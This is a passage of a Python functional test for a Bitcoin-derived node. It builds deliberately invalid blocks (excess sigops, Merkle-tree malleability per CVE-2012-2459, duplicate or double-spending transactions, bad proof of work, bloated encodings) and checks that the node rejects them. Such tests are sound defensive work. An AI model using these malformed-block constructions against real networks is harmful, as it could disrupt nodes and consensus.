# Extend the b26 chain to make sure bitcoind isn't accepting b26
b27 = self.next_block(27, spend=out[7])
self.sync_blocks([b27], False)
# Now try a too-large-coinbase script
self.move_tip(15)
b28 = self.next_block(28, spend=out[6])
b28.vtx[0].vin[0].scriptSig = b'\x00' * 101
b28.vtx[0].rehash()
b28 = self.update_block(28, [])
self.sync_blocks([b28], success=False, reject_reason='bad-cb-length', reconnect=True)
# Extend the b28 chain to make sure bitcoind isn't accepting b28
b29 = self.next_block(29, spend=out[7])
self.sync_blocks([b29], False)
# b30 has a max-sized coinbase scriptSig.
self.move_tip(23)
b30 = self.next_block(30)
b30.vtx[0].vin[0].scriptSig += b'\x00' * 90
b30.vtx[0].rehash()
b30 = self.update_block(30, [])
self.sync_blocks([b30], True)
self.save_spendable_output()
# b31 - b35 - check sigops of OP_CHECKMULTISIG / OP_CHECKMULTISIGVERIFY / OP_CHECKSIGVERIFY
#
# genesis -> ... -> b30 (7) -> b31 (8) -> b33 (9) -> b35 (10)
# \-> b36 (11)
# \-> b34 (10)
# \-> b32 (9)
#
# MULTISIG: each op code counts as 20 sigops. To create the edge case, pack another 19 sigops at the end.
self.log.info("Accept a block with the max number of OP_CHECKMULTISIG sigops")
lots_of_multisigs = CScript([OP_CHECKMULTISIG] * ((MAX_BLOCK_SIGOPS - 1) // 20) + [OP_CHECKSIG] * 19)
b31 = self.next_block(31, spend=out[8], script=lots_of_multisigs)
assert_equal(get_legacy_sigopcount_block(b31), MAX_BLOCK_SIGOPS)
self.sync_blocks([b31], True)
self.save_spendable_output()
# this goes over the limit because the coinbase has one sigop
self.log.info("Reject a block with too many OP_CHECKMULTISIG sigops")
too_many_multisigs = CScript([OP_CHECKMULTISIG] * (MAX_BLOCK_SIGOPS // 20))
b32 = self.next_block(32, spend=out[9], script=too_many_multisigs)
assert_equal(get_legacy_sigopcount_block(b32), MAX_BLOCK_SIGOPS + 1)
self.sync_blocks([b32], success=False, reject_reason='bad-blk-sigops', reconnect=True)
# CHECKMULTISIGVERIFY
self.log.info("Accept a block with the max number of OP_CHECKMULTISIGVERIFY sigops")
self.move_tip(31)
lots_of_multisigs = CScript([OP_CHECKMULTISIGVERIFY] * ((MAX_BLOCK_SIGOPS - 1) // 20) + [OP_CHECKSIG] * 19)
b33 = self.next_block(33, spend=out[9], script=lots_of_multisigs)
self.sync_blocks([b33], True)
self.save_spendable_output()
self.log.info("Reject a block with too many OP_CHECKMULTISIGVERIFY sigops")
too_many_multisigs = CScript([OP_CHECKMULTISIGVERIFY] * (MAX_BLOCK_SIGOPS // 20))
b34 = self.next_block(34, spend=out[10], script=too_many_multisigs)
self.sync_blocks([b34], success=False, reject_reason='bad-blk-sigops', reconnect=True)
# CHECKSIGVERIFY
self.log.info("Accept a block with the max number of OP_CHECKSIGVERIFY sigops")
self.move_tip(33)
lots_of_checksigs = CScript([OP_CHECKSIGVERIFY] * (MAX_BLOCK_SIGOPS - 1))
b35 = self.next_block(35, spend=out[10], script=lots_of_checksigs)
self.sync_blocks([b35], True)
self.save_spendable_output()
self.log.info("Reject a block with too many OP_CHECKSIGVERIFY sigops")
too_many_checksigs = CScript([OP_CHECKSIGVERIFY] * (MAX_BLOCK_SIGOPS))
b36 = self.next_block(36, spend=out[11], script=too_many_checksigs)
self.sync_blocks([b36], success=False, reject_reason='bad-blk-sigops', reconnect=True)
# Check spending of a transaction in a block which failed to connect
#
# b6 (3)
# b12 (3) -> b13 (4) -> b15 (5) -> b23 (6) -> b30 (7) -> b31 (8) -> b33 (9) -> b35 (10)
# \-> b37 (11)
# \-> b38 (11/37)
#
# save 37's spendable output, but then double-spend out11 to invalidate the block
self.log.info("Reject a block spending transaction from a block which failed to connect")
self.move_tip(35)
b37 = self.next_block(37, spend=out[11])
txout_b37 = b37.vtx[1]
tx = self.create_and_sign_transaction(out[11], 0)
b37 = self.update_block(37, [tx])
self.sync_blocks([b37], success=False, reject_reason='bad-txns-inputs-missingorspent', reconnect=True)
# attempt to spend b37's first non-coinbase tx, at which point b37 was still considered valid
self.move_tip(35)
b38 = self.next_block(38, spend=txout_b37)
self.sync_blocks([b38], success=False, reject_reason='bad-txns-inputs-missingorspent', reconnect=True)
# Check P2SH SigOp counting
#
#
# 13 (4) -> b15 (5) -> b23 (6) -> b30 (7) -> b31 (8) -> b33 (9) -> b35 (10) -> b39 (11) -> b41 (12)
# \-> b40 (12)
#
# b39 - create some P2SH outputs that will require 6 sigops to spend:
#
# redeem_script = COINBASE_PUBKEY, (OP_2DUP+OP_CHECKSIGVERIFY) * 5, OP_CHECKSIG
# p2sh_script = OP_HASH160, ripemd160(sha256(script)), OP_EQUAL
#
self.log.info("Check P2SH SIGOPS are correctly counted")
self.move_tip(35)
b39 = self.next_block(39)
b39_outputs = 0
b39_sigops_per_output = 6
# Build the redeem script, hash it, use hash to create the p2sh script
redeem_script = CScript([self.coinbase_pubkey] + [OP_2DUP, OP_CHECKSIGVERIFY] * 5 + [OP_CHECKSIG])
redeem_script_hash = hash160(redeem_script)
p2sh_script = CScript([OP_HASH160, redeem_script_hash, OP_EQUAL])
# Create a transaction that spends one satoshi to the p2sh_script, the rest to OP_TRUE
# This must be signed because it is spending a coinbase
spend = out[11]
tx = self.create_tx(spend, 0, 1, p2sh_script)
tx.vout.append(CTxOut(spend.vout[0].nValue - 1, CScript([OP_TRUE])))
self.sign_tx(tx, spend)
tx.rehash()
b39 = self.update_block(39, [tx])
b39_outputs += 1
# Until block is full, add tx's with 1 satoshi to p2sh_script, the rest to OP_TRUE
tx_new = None
tx_last = tx
total_size = len(b39.serialize())
while(total_size < MAX_BLOCK_BASE_SIZE):
tx_new = self.create_tx(tx_last, 1, 1, p2sh_script)
tx_new.vout.append(CTxOut(tx_last.vout[1].nValue - 1, CScript([OP_TRUE])))
tx_new.rehash()
total_size += len(tx_new.serialize())
if total_size >= MAX_BLOCK_BASE_SIZE:
break
b39.vtx.append(tx_new) # add tx to block
tx_last = tx_new
b39_outputs += 1
b39 = self.update_block(39, [])
self.sync_blocks([b39], True)
self.save_spendable_output()
# Test sigops in P2SH redeem scripts
#
# b40 creates 3333 tx's spending the 6-sigop P2SH outputs from b39 for a total of 19998 sigops.
# The first tx has one sigop and then at the end we add 2 more to put us just over the max.
#
# b41 does the same, less one, so it has the maximum sigops permitted.
#
self.log.info("Reject a block with too many P2SH sigops")
self.move_tip(39)
b40 = self.next_block(40, spend=out[12])
sigops = get_legacy_sigopcount_block(b40)
numTxes = (MAX_BLOCK_SIGOPS - sigops) // b39_sigops_per_output
assert_equal(numTxes <= b39_outputs, True)
lastOutpoint = COutPoint(b40.vtx[1].sha256, 0)
new_txs = []
for i in range(1, numTxes + 1):
tx = CTransaction()
tx.vout.append(CTxOut(1, CScript([OP_TRUE])))
tx.vin.append(CTxIn(lastOutpoint, b''))
# second input is corresponding P2SH output from b39
tx.vin.append(CTxIn(COutPoint(b39.vtx[i].sha256, 0), b''))
# Note: must pass the redeem_script (not p2sh_script) to the signature hash function
(sighash, err) = SignatureHash(redeem_script, tx, 1, SIGHASH_ALL)
sig = self.coinbase_key.sign_ecdsa(sighash) + bytes(bytearray([SIGHASH_ALL]))
scriptSig = CScript([sig, redeem_script])
tx.vin[1].scriptSig = scriptSig
tx.rehash()
new_txs.append(tx)
lastOutpoint = COutPoint(tx.sha256, 0)
b40_sigops_to_fill = MAX_BLOCK_SIGOPS - (numTxes * b39_sigops_per_output + sigops) + 1
tx = CTransaction()
tx.vin.append(CTxIn(lastOutpoint, b''))
tx.vout.append(CTxOut(1, CScript([OP_CHECKSIG] * b40_sigops_to_fill)))
tx.rehash()
new_txs.append(tx)
self.update_block(40, new_txs)
self.sync_blocks([b40], success=False, reject_reason='bad-blk-sigops', reconnect=True)
# same as b40, but one less sigop
self.log.info("Accept a block with the max number of P2SH sigops")
self.move_tip(39)
b41 = self.next_block(41, spend=None)
self.update_block(41, b40.vtx[1:-1])
b41_sigops_to_fill = b40_sigops_to_fill - 1
tx = CTransaction()
tx.vin.append(CTxIn(lastOutpoint, b''))
tx.vout.append(CTxOut(1, CScript([OP_CHECKSIG] * b41_sigops_to_fill)))
tx.rehash()
self.update_block(41, [tx])
self.sync_blocks([b41], True)
# Fork off of b39 to create a constant base again
#
# b23 (6) -> b30 (7) -> b31 (8) -> b33 (9) -> b35 (10) -> b39 (11) -> b42 (12) -> b43 (13)
# \-> b41 (12)
#
self.move_tip(39)
b42 = self.next_block(42, spend=out[12])
self.save_spendable_output()
b43 = self.next_block(43, spend=out[13])
self.save_spendable_output()
self.sync_blocks([b42, b43], True)
# Test a number of really invalid scenarios
#
# -> b31 (8) -> b33 (9) -> b35 (10) -> b39 (11) -> b42 (12) -> b43 (13) -> b44 (14)
# \-> ??? (15)
# The next few blocks are going to be created "by hand" since they'll do funky things, such as having
# the first transaction be non-coinbase, etc. The purpose of b44 is to make sure this works.
self.log.info("Build block 44 manually")
height = self.block_heights[self.tip.sha256] + 1
coinbase = create_coinbase(height, self.coinbase_pubkey)
b44 = CBlock()
b44.nTime = self.tip.nTime + 1
b44.hashPrevBlock = self.tip.sha256
b44.nBits = 0x207fffff
b44.vtx.append(coinbase)
b44.hashMerkleRoot = b44.calc_merkle_root()
b44.solve()
self.tip = b44
self.block_heights[b44.sha256] = height
self.blocks[44] = b44
self.sync_blocks([b44], True)
self.log.info("Reject a block with a non-coinbase as the first tx")
non_coinbase = self.create_tx(out[15], 0, 1)
b45 = CBlock()
b45.nTime = self.tip.nTime + 1
b45.hashPrevBlock = self.tip.sha256
b45.nBits = 0x207fffff
b45.vtx.append(non_coinbase)
b45.hashMerkleRoot = b45.calc_merkle_root()
b45.calc_sha256()
b45.solve()
self.block_heights[b45.sha256] = self.block_heights[self.tip.sha256] + 1
self.tip = b45
self.blocks[45] = b45
self.sync_blocks([b45], success=False, reject_reason='bad-cb-missing', reconnect=True)
self.log.info("Reject a block with no transactions")
self.move_tip(44)
b46 = CBlock()
b46.nTime = b44.nTime + 1
b46.hashPrevBlock = b44.sha256
b46.nBits = 0x207fffff
b46.vtx = []
b46.hashMerkleRoot = 0
b46.solve()
self.block_heights[b46.sha256] = self.block_heights[b44.sha256] + 1
self.tip = b46
assert 46 not in self.blocks
self.blocks[46] = b46
self.sync_blocks([b46], success=False, reject_reason='bad-cb-missing', reconnect=True)
self.log.info("Reject a block with invalid work")
self.move_tip(44)
b47 = self.next_block(47, solve=False)
target = uint256_from_compact(b47.nBits)
while b47.sha256 < target:
b47.nNonce += 1
b47.rehash()
self.sync_blocks([b47], False, force_send=True, reject_reason='high-hash')
self.log.info("Reject a block with a timestamp >2 hours in the future")
self.move_tip(44)
b48 = self.next_block(48, solve=False)
b48.nBits -= 1
b48.solve()
self.sync_blocks([b48], False, force_send=True, reconnect=True)
self.log.info("Reject a block with invalid merkle hash")
self.move_tip(44)
b49 = self.next_block(49)
b49.hashMerkleRoot += 1
b49.solve()
self.sync_blocks([b49], success=False, reject_reason='bad-txnmrklroot', reconnect=True)
self.log.info("Reject a block with incorrect POW limit")
self.move_tip(44)
b50 = self.next_block(50)
b50.nBits = b50.nBits - 1
b50.solve()
self.sync_blocks([b50], False, force_send=True, reject_reason='bad-diffbits', reconnect=True)
self.log.info("Reject a block with two coinbase transactions")
self.move_tip(44)
b51 = self.next_block(51)
cb2 = create_coinbase(51, self.coinbase_pubkey)
b51 = self.update_block(51, [cb2])
self.sync_blocks([b51], success=False, reject_reason='bad-cb-multiple', reconnect=True)
self.log.info("Reject a block with duplicate transactions")
# Note: txns have to be in the right position in the merkle tree to trigger this error
self.move_tip(44)
b52 = self.next_block(52, spend=out[15])
tx = self.create_tx(b52.vtx[1], 0, 1)
b52 = self.update_block(52, [tx, tx])
self.sync_blocks([b52], success=False, reject_reason='bad-txns-duplicate', reconnect=True)
# Test block timestamps
# -> b31 (8) -> b33 (9) -> b35 (10) -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15)
# \-> b54 (15)
#
self.move_tip(43)
b53 = self.next_block(53, spend=out[14])
self.sync_blocks([b53], False, force_send=False)
self.save_spendable_output()
self.log.info("Reject a block with timestamp before MedianTimePast")
b54 = self.next_block(54, spend=out[15])
b54.nBits -= 1
b54.solve()
self.sync_blocks([b54], False, force_send=True, reconnect=True)
# valid timestamp
self.move_tip(53)
b55 = self.next_block(55, spend=out[15])
b55.nTime = b35.nTime
self.update_block(55, [])
self.sync_blocks([b55], True, force_send=True)
self.save_spendable_output()
# Test Merkle tree malleability
#
# -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57p2 (16)
# \-> b57 (16)
# \-> b56p2 (16)
# \-> b56 (16)
#
# Merkle tree malleability (CVE-2012-2459): repeating sequences of transactions in a block without
# affecting the merkle root of a block, while still invalidating it.
# See: src/consensus/merkle.h
#
# b57 has three txns: coinbase, tx, tx1. The merkle root computation will duplicate tx.
# Result: OK
#
# b56 copies b57 but duplicates tx1 and does not recalculate the block hash. So it has a valid merkle
# root but duplicate transactions.
# Result: Fails
#
# b57p2 has six transactions in its merkle tree:
# - coinbase, tx, tx1, tx2, tx3, tx4
# Merkle root calculation will duplicate as necessary.
# Result: OK.
#
# b56p2 copies b57p2 but adds both tx3 and tx4. The purpose of the test is to make sure the code catches
# duplicate txns that are not next to one another with the "bad-txns-duplicate" error (which indicates
# that the error was caught early, avoiding a DOS vulnerability.)
# b57 - a good block with 2 txs, don't submit until end
self.move_tip(55)
b57 = self.next_block(57)
tx = self.create_and_sign_transaction(out[16], 1)
tx1 = self.create_tx(tx, 0, 1)
b57 = self.update_block(57, [tx, tx1])
# b56 - copy b57, add a duplicate tx
self.log.info("Reject a block with a duplicate transaction in the Merkle Tree (but with a valid Merkle Root)")
self.move_tip(55)
b56 = copy.deepcopy(b57)
self.blocks[56] = b56
assert_equal(len(b56.vtx), 3)
b56 = self.update_block(56, [tx1])
assert_equal(b56.hash, b57.hash)
self.sync_blocks([b56], success=False, reject_reason='bad-txns-duplicate', reconnect=True)
# b57p2 - a good block with 6 tx'es, don't submit until end
self.move_tip(55)
b57p2 = self.next_block("57p2")
tx = self.create_and_sign_transaction(out[16], 1)
tx1 = self.create_tx(tx, 0, 1)
tx2 = self.create_tx(tx1, 0, 1)
tx3 = self.create_tx(tx2, 0, 1)
tx4 = self.create_tx(tx3, 0, 1)
b57p2 = self.update_block("57p2", [tx, tx1, tx2, tx3, tx4])
# b56p2 - copy b57p2, duplicate two non-consecutive tx's
self.log.info("Reject a block with two duplicate transactions in the Merkle Tree (but with a valid Merkle Root)")
self.move_tip(55)
b56p2 = copy.deepcopy(b57p2)
self.blocks["b56p2"] = b56p2
assert_equal(b56p2.hash, b57p2.hash)
assert_equal(len(b56p2.vtx), 6)
b56p2 = self.update_block("b56p2", [tx3, tx4])
self.sync_blocks([b56p2], success=False, reject_reason='bad-txns-duplicate', reconnect=True)
self.move_tip("57p2")
self.sync_blocks([b57p2], True)
self.move_tip(57)
self.sync_blocks([b57], False) # The tip is not updated because 57p2 seen first
self.save_spendable_output()
# Test a few invalid tx types
#
# -> b35 (10) -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17)
# \-> ??? (17)
#
# tx with prevout.n out of range
self.log.info("Reject a block with a transaction with prevout.n out of range")
self.move_tip(57)
b58 = self.next_block(58, spend=out[17])
tx = CTransaction()
assert(len(out[17].vout) < 42)
tx.vin.append(CTxIn(COutPoint(out[17].sha256, 42), CScript([OP_TRUE]), 0xffffffff))
tx.vout.append(CTxOut(0, CScript([OP_TRUE])))
tx.calc_sha256()
b58 = self.update_block(58, [tx])
self.sync_blocks([b58], success=False, reject_reason='bad-txns-inputs-missingorspent', reconnect=True)
# tx with output value > input value
self.log.info("Reject a block with a transaction with outputs > inputs")
self.move_tip("57p2")
b59 = self.next_block(59)
tx = self.create_and_sign_transaction(out[17], int(INITIAL_BLOCK_REWARD+1) * COIN)
b59 = self.update_block(59, [tx])
self.sync_blocks([b59], success=False, reject_reason='bad-txns-in-belowout', reconnect=True)
# reset to good chain
self.move_tip(57)
b60 = self.next_block(60, spend=out[17])
self.sync_blocks([b60], True)
self.save_spendable_output()
# Test BIP30
#
# -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17)
# \-> b61 (18)
#
# Blocks are not allowed to contain a transaction whose id matches that of an earlier,
# not-fully-spent transaction in the same chain. To test, make identical coinbases;
# the second one should be rejected.
#
# RUNEBASE: Since we enable BIP34 from block 0, this BIP30 test is no longer relevant. This test has therefore been removed.
#self.log.info("Reject a block with a transaction with a duplicate hash of a previous transaction (BIP30)")
#self.move_tip(60)
#b61 = self.next_block(61, spend=out[18])
#b61.vtx[0].vin[0].scriptSig = b60.vtx[0].vin[0].scriptSig # Equalize the coinbases
#b61.vtx[0].rehash()
#b61 = self.update_block(61, [])
#assert_equal(b60.vtx[0].serialize(), b61.vtx[0].serialize())
#self.sync_blocks([b61], success=False, reject_reason='bad-txns-BIP30', reconnect=True)
# Test tx.isFinal is properly rejected (not an exhaustive tx.isFinal test, that should be in data-driven transaction tests)
#
# -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17)
# \-> b62 (18)
#
self.log.info("Reject a block with a transaction with a nonfinal locktime")
self.move_tip(60)
b62 = self.next_block(62)
tx = CTransaction()
tx.nLockTime = 0xffffffff # this locktime is non-final
tx.vin.append(CTxIn(COutPoint(out[18].sha256, 0))) # don't set nSequence
tx.vout.append(CTxOut(0, CScript([OP_TRUE])))
assert(tx.vin[0].nSequence < 0xffffffff)
tx.calc_sha256()
b62 = self.update_block(62, [tx])
self.sync_blocks([b62], success=False, reject_reason='bad-txns-nonfinal')
# Test a non-final coinbase is also rejected
#
# -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17)
# \-> b63 (-)
#
self.log.info("Reject a block with a coinbase transaction with a nonfinal locktime")
self.move_tip(60)
b63 = self.next_block(63)
b63.vtx[0].nLockTime = 0xffffffff
b63.vtx[0].vin[0].nSequence = 0xDEADBEEF
b63.vtx[0].rehash()
b63 = self.update_block(63, [])
self.sync_blocks([b63], success=False, reject_reason='bad-txns-nonfinal')
# This checks that a block with a bloated VARINT between the block_header and the array of tx such that
# the block is > MAX_BLOCK_BASE_SIZE with the bloated varint, but <= MAX_BLOCK_BASE_SIZE without the bloated varint,
# does not cause a subsequent, identical block with canonical encoding to be rejected. The test does not
# care whether the bloated block is accepted or rejected; it only cares that the second block is accepted.
#
# What matters is that the receiving node should not reject the bloated block, and then reject the canonical
# block on the basis that it's the same as an already-rejected block (which would be a consensus failure.)
#
# -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18)
# \
# b64a (18)
# b64a is a bloated block (non-canonical varint)
# b64 is a good block (same as b64 but w/ canonical varint)
#
self.log.info("Accept a valid block even if a bloated version of the block has previously been sent")
self.move_tip(60)
regular_block = self.next_block("64a", spend=out[18])
# make it a "broken_block," with non-canonical serialization
b64a = CBrokenBlock(regular_block)
b64a.initialize(regular_block)
self.blocks["64a"] = b64a
self.tip = b64a
tx = CTransaction()
# use canonical serialization to calculate size
script_length = 1000000 - len(b64a.normal_serialize()) - 69
script_output = CScript([b'\x00' * script_length])
tx.vout.append(CTxOut(0, script_output))
tx.vin.append(CTxIn(COutPoint(b64a.vtx[1].sha256, 0)))
b64a = self.update_block("64a", [tx])
assert_equal(len(b64a.serialize()), 1000000 + 8)
self.sync_blocks([b64a], success=False, reject_reason='non-canonical ReadCompactSize()')
# bitcoind doesn't disconnect us for sending a bloated block, but if we subsequently
# resend the header message, it won't send us the getdata message again. Just
# disconnect and reconnect and then call sync_blocks.
# TODO: improve this test to be less dependent on P2P DOS behaviour.
node.disconnect_p2ps()
self.reconnect_p2p()
self.move_tip(60)
b64 = CBlock(b64a)
b64.vtx = copy.deepcopy(b64a.vtx)
assert_equal(b64.hash, b64a.hash)
assert_equal(len(b64.serialize()), 1000000)
self.blocks[64] = b64
b64 = self.update_block(64, [])
self.sync_blocks([b64], True)
self.save_spendable_output()
# Spend an output created in the block itself
#
# -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19)
#
self.log.info("Accept a block with a transaction spending an output created in the same block")
self.move_tip(64)
b65 = self.next_block(65)
tx1 = self.create_and_sign_transaction(out[19], out[19].vout[0].nValue)
tx2 = self.create_and_sign_transaction(tx1, 0)
b65 = self.update_block(65, [tx1, tx2])
self.sync_blocks([b65], True)
self.save_spendable_output()
# Attempt to spend an output created later in the same block
#
# -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19)
# \-> b66 (20)
self.log.info("Reject a block with a transaction spending an output created later in the same block")
self.move_tip(65)
b66 = self.next_block(66)
tx1 = self.create_and_sign_transaction(out[20], out[20].vout[0].nValue)
tx2 = self.create_and_sign_transaction(tx1, 1)
b66 = self.update_block(66, [tx2, tx1])
self.sync_blocks([b66], success=False, reject_reason='bad-txns-inputs-missingorspent', reconnect=True)
# Attempt to double-spend a transaction created in a block
#
# -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19)
# \-> b67 (20)
#
#
self.log.info("Reject a block with a transaction double spending a transaction created in the same block")
self.move_tip(65)
b67 = self.next_block(67)
tx1 = self.create_and_sign_transaction(out[20], out[20].vout[0].nValue)
tx2 = self.create_and_sign_transaction(tx1, 1)
tx3 = self.create_and_sign_transaction(tx1, 2)
b67 = self.update_block(67, [tx1, tx2, tx3])
self.sync_blocks([b67], success=False, reject_reason='bad-txns-inputs-missingorspent', reconnect=True)
# More tests of block subsidy
#
# -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) -> b69 (20)
# \-> b68 (20)
#
# b68 - coinbase with an extra 10 satoshis,
# creates a tx that has 9 satoshis from out[20] go to fees
# this fails because the coinbase is trying to claim 1 satoshi too much in fees
#
# b69 - coinbase with extra 10 satoshis, and a tx that gives a 10 satoshi fee
# this succeeds
#
self.log.info("Reject a block trying to claim too much subsidy in the coinbase transaction")
self.move_tip(65)
b68 = self.next_block(68, additional_coinbase_value=10)
tx = self.create_and_sign_transaction(out[20], out[20].vout[0].nValue - 9)
b68 = self.update_block(68, [tx])
self.sync_blocks([b68], success=False, reconnect=True)
self.log.info("Accept a block claiming the correct subsidy in the coinbase transaction")
self.move_tip(65)
b69 = self.next_block(69, additional_coinbase_value=10)
tx = self.create_and_sign_transaction(out[20], out[20].vout[0].nValue - 10)
self.update_block(69, [tx])
self.sync_blocks([b69], True)
self.save_spendable_output()
# Test spending the outpoint of a non-existent transaction
#
# -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) -> b69 (20)
# \-> b70 (21)
#
self.log.info("Reject a block containing a transaction spending from a non-existent input")
self.move_tip(69)
b70 = self.next_block(70, spend=out[21])
bogus_tx = CTransaction()
bogus_tx.sha256 = uint256_from_str(b"23c70ed7c0506e9178fc1a987f40a33946d4ad4c962b5ae3a52546da53af0c5c")
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(bogus_tx.sha256, 0), b"", 0xffffffff))
tx.vout.append(CTxOut(1, b""))
b70 = self.update_block(70, [tx])
self.sync_blocks([b70], success=False, reject_reason='bad-txns-inputs-missingorspent', reconnect=True)
# Test accepting an invalid block which has the same hash as a valid one (via merkle tree tricks)
#
# -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) -> b69 (20) -> b72 (21)
# \-> b71 (21)
#
# b72 is a good block.
# b71 is a copy of 72, but re-adds one of its transactions. However, it has the same hash as b72.
self.log.info("Reject a block containing a duplicate transaction but with the same Merkle root (Merkle tree malleability")
self.move_tip(69)
b72 = self.next_block(72)
tx1 = self.create_and_sign_transaction(out[21], 2)
tx2 = self.create_and_sign_transaction(tx1, 1)
b72 = self.update_block(72, [tx1, tx2]) # now tip is 72
b71 = copy.deepcopy(b72)
b71.vtx.append(tx2) # add duplicate tx2
self.block_heights[b71.sha256] = self.block_heights[b69.sha256] + 1 # b71 builds off b69
self.blocks[71] = b71
assert_equal(len(b71.vtx), 4)
assert_equal(len(b72.vtx), 3)
assert_equal(b72.sha256, b71.sha256)
self.move_tip(71)
self.sync_blocks([b71], success=False, reject_reason='bad-txns-duplicate', reconnect=True)
self.move_tip(72)
self.sync_blocks([b72], True)
self.save_spendable_output()
# Test some invalid scripts and MAX_BLOCK_SIGOPS
#
# -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) -> b69 (20) -> b72 (21)
# \-> b** (22)
#
# b73 - tx with excessive sigops that are placed after an excessively large script element.
# The purpose of the test is to make sure those sigops are counted.
#
# script is a bytearray of size 20,526
#
# bytearray[0-19,998] : OP_CHECKSIG
# bytearray[19,999] : OP_PUSHDATA4
# bytearray[20,000-20,003]: 521 (max_script_element_size+1, in little-endian format)
# bytearray[20,004-20,525]: unread data (script_element)
# bytearray[20,526] : OP_CHECKSIG (this puts us over the limit)
self.log.info("Reject a block containing too many sigops after a large script element")
self.move_tip(72)
b73 = self.next_block(73)
size = MAX_BLOCK_SIGOPS - 1 + MAX_SCRIPT_ELEMENT_SIZE + 1 + 5 + 1
a = bytearray([OP_CHECKSIG] * size)
a[MAX_BLOCK_SIGOPS - 1] = int("4e", 16) # OP_PUSHDATA4
element_size = MAX_SCRIPT_ELEMENT_SIZE + 1
a[MAX_BLOCK_SIGOPS] = element_size % 256
a[MAX_BLOCK_SIGOPS + 1] = element_size // 256
a[MAX_BLOCK_SIGOPS + 2] = 0
a[MAX_BLOCK_SIGOPS + 3] = 0
tx = self.create_and_sign_transaction(out[22], 1, CScript(a))
b73 = self.update_block(73, [tx])
assert_equal(get_legacy_sigopcount_block(b73), MAX_BLOCK_SIGOPS + 1)
self.sync_blocks([b73], success=False, reject_reason='bad-blk-sigops', reconnect=True)
# b74/75 - if we push an invalid script element, all previous sigops are counted,
# but sigops after the element are not counted.
#
# The invalid script element is that the push_data indicates that
# there will be a large amount of data (0xffffff bytes), but we only
# provide a much smaller number. These bytes are CHECKSIGS so they would
# cause b75 to fail for excessive sigops, if those bytes were counted.
#
# b74 fails because we put MAX_BLOCK_SIGOPS+1 before the element
# b75 succeeds because we put MAX_BLOCK_SIGOPS before the element
self.log.info("Check sigops are counted correctly after an invalid script element")
self.move_tip(72)
b74 = self.next_block(74)
size = MAX_BLOCK_SIGOPS - 1 + MAX_SCRIPT_ELEMENT_SIZE + 42 # total = 20,561
a = bytearray([OP_CHECKSIG] * size)
a[MAX_BLOCK_SIGOPS] = 0x4e
a[MAX_BLOCK_SIGOPS + 1] = 0xfe
a[MAX_BLOCK_SIGOPS + 2] = 0xff
a[MAX_BLOCK_SIGOPS + 3] = 0xff
a[MAX_BLOCK_SIGOPS + 4] = 0xff
tx = self.create_and_sign_transaction(out[22], 1, CScript(a))
b74 = self.update_block(74, [tx])
self.sync_blocks([b74], success=False, reject_reason='bad-blk-sigops', reconnect=True)
self.move_tip(72)
b75 = self.next_block(75)
size = MAX_BLOCK_SIGOPS - 1 + MAX_SCRIPT_ELEMENT_SIZE + 42
a = bytearray([OP_CHECKSIG] * size)
a[MAX_BLOCK_SIGOPS - 1] = 0x4e
a[MAX_BLOCK_SIGOPS] = 0xff
a[MAX_BLOCK_SIGOPS + 1] = 0xff
a[MAX_BLOCK_SIGOPS + 2] = 0xff
a[MAX_BLOCK_SIGOPS + 3] = 0xff
tx = self.create_and_sign_transaction(out[22], 1, CScript(a))
b75 = self.update_block(75, [tx])
self.sync_blocks([b75], True)
self.save_spendable_output()
# Check that if we push an element filled with CHECKSIGs, they are not counted
self.move_tip(75)
b76 = self.next_block(76)
size = MAX_BLOCK_SIGOPS - 1 + MAX_SCRIPT_ELEMENT_SIZE + 1 + 5
a = bytearray([OP_CHECKSIG] * size)
a[MAX_BLOCK_SIGOPS - 1] = 0x4e # PUSHDATA4, but leave the following bytes as just checksigs
tx = self.create_and_sign_transaction(out[23], 1, CScript(a))
b76 = self.update_block(76, [tx])
self.sync_blocks([b76], True)
self.save_spendable_output()
# Test transaction resurrection
#
# -> b77 (24) -> b78 (25) -> b79 (26)
# \-> b80 (25) -> b81 (26) -> b82 (27)
#
# b78 creates a tx, which is spent in b79. After b82, both should be in mempool
#
# The tx'es must be unsigned and pass the node's mempool policy. It is unsigned for the
# rather obscure reason that the Python signature code does not distinguish between
# Low-S and High-S values (whereas the bitcoin code has custom code which does so);
# as a result of which, the odds are 50% that the python code will use the right
# value and the transaction will be accepted into the mempool. Until we modify the
# test framework to support low-S signing, we are out of luck.
#
# To get around this issue, we construct transactions which are not signed and which
# spend to OP_TRUE. If the standard-ness rules change, this test would need to be
# updated. (Perhaps to spend to a P2SH OP_TRUE script)
self.log.info("Test transaction resurrection during a re-org")
self.move_tip(76)
b77 = self.next_block(77)
tx77 = self.create_and_sign_transaction(out[24], 10 * COIN)
b77 = self.update_block(77, [tx77])
self.sync_blocks([b77], True)
self.save_spendable_output()
b78 = self.next_block(78)
tx78 = self.create_tx(tx77, 0, 9 * COIN)
b78 = self.update_block(78, [tx78])
self.sync_blocks([b78], True)
b79 = self.next_block(79)
tx79 = self.create_tx(tx78, 0, 8 * COIN)
b79 = self.update_block(79, [tx79])
self.sync_blocks([b79], True)
# mempool should be empty
assert_equal(len(self.nodes[0].getrawmempool()), 0)
self.move_tip(77)
b80 = self.next_block(80, spend=out[25])
self.sync_blocks([b80], False, force_send=True)
